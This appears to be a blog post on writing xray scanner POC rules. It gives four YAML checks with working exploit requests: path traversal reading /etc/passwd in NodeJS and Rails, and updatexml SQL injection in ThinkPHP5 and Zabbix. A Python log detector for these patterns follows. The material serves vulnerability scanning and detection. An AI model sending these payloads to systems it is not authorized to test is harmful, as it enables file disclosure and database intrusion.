Writing a POC in PHP; pitfalls when writing xray POCs

Published: 2024/9/19

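The static file directory is not necessarily `static`.

Only the Linux case is considered. What about Windows: can some of the application's own source code be read instead?

In a real environment the parameter is not necessarily `id`; ThinkPHP is not well suited to being written as a POC.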

NodeJS_path-validation_CVE-2017-14849.yml

```yaml
name: NodeJS_path-validation_CVE-2017-14849
rules:
  - method: GET
    path: /static/../../../a/../../../../etc/passwd
    headers:
      Accept: ''
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "NodeJS 8.5.0"
  links:
    - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849
```

Rails_file_content_disclosure_CVE-2019-5418

```yaml
name: Rails_file_content_disclosure_CVE-2019-5418
rules:
  - method: GET
    path: /robots
    headers:
      Accept: '../../../../../../../../etc/passwd{{'
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418
```

thinkphp5-in-sqlinjection

```yaml
name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
```

zabbix_3.0.3_jsrpc.php_CVE-2016-10134

```yaml
name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
rules:
  - method: GET
    path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
  vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
```
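The four rules above leave recognisable traces in request logs. As an added example (not part of the original post or of xray), a small Python check that flags those request patterns; the `classify` and `scan` functions, the signature labels and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Patterns taken from the four POC rules on this page.
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")          # a ../ path segment
SQL_ERROR_FUNC = re.compile(r"\bupdatexml\s*\(", re.I)  # error-based SQLi helper

def classify(path, headers):
    """Return the probe signatures (labels chosen here) that one request matches."""
    hits = []
    decoded = unquote(unquote(path))        # undo up to two layers of URL encoding
    url_path, _, query = decoded.partition("?")
    if TRAVERSAL.search(url_path):
        hits.append("path-traversal-in-url")        # NodeJS rule
    accept = headers.get("Accept", "")
    if TRAVERSAL.search(accept) or "{{" in accept:
        hits.append("path-in-accept-header")        # Rails rule
    if SQL_ERROR_FUNC.search(query):
        hits.append("error-based-sqli-function")    # ThinkPHP and Zabbix rules
    return hits

# Constructed sample records: (request path, request headers).
SAMPLES = [
    ("/static/../../../a/../../../../etc/passwd", {"Accept": ""}),
    ("/robots", {"Accept": "../../../../../../../../etc/passwd{{"}),
    ("/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1", {}),
    ("/jsrpc.php?type=0&mode=1&profileIdx2=updatexml%280%2C1%2C0%29", {}),
    ("/static/css/site.css", {"Accept": "text/css,*/*;q=0.1"}),   # benign
    ("/docs/v1..v2/changelog?id=7", {"Accept": "text/html"}),     # benign, dots inside a name
]

def scan(samples):
    """Map each flagged request path to its signatures; clean requests are omitted."""
    return {p: h for p, hdrs in samples if (h := classify(p, hdrs))}

if __name__ == "__main__":
    for path, hits in scan(SAMPLES).items():
        print(hits, path)
```

Feed it the raw request line and headers as received, since a proxy or framework that collapses `../` before logging will hide the first pattern.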

Source: cnblogs (博客園)

Author: 17bdw

Link: https://www.cnblogs.com/17bdw/p/11515741.html
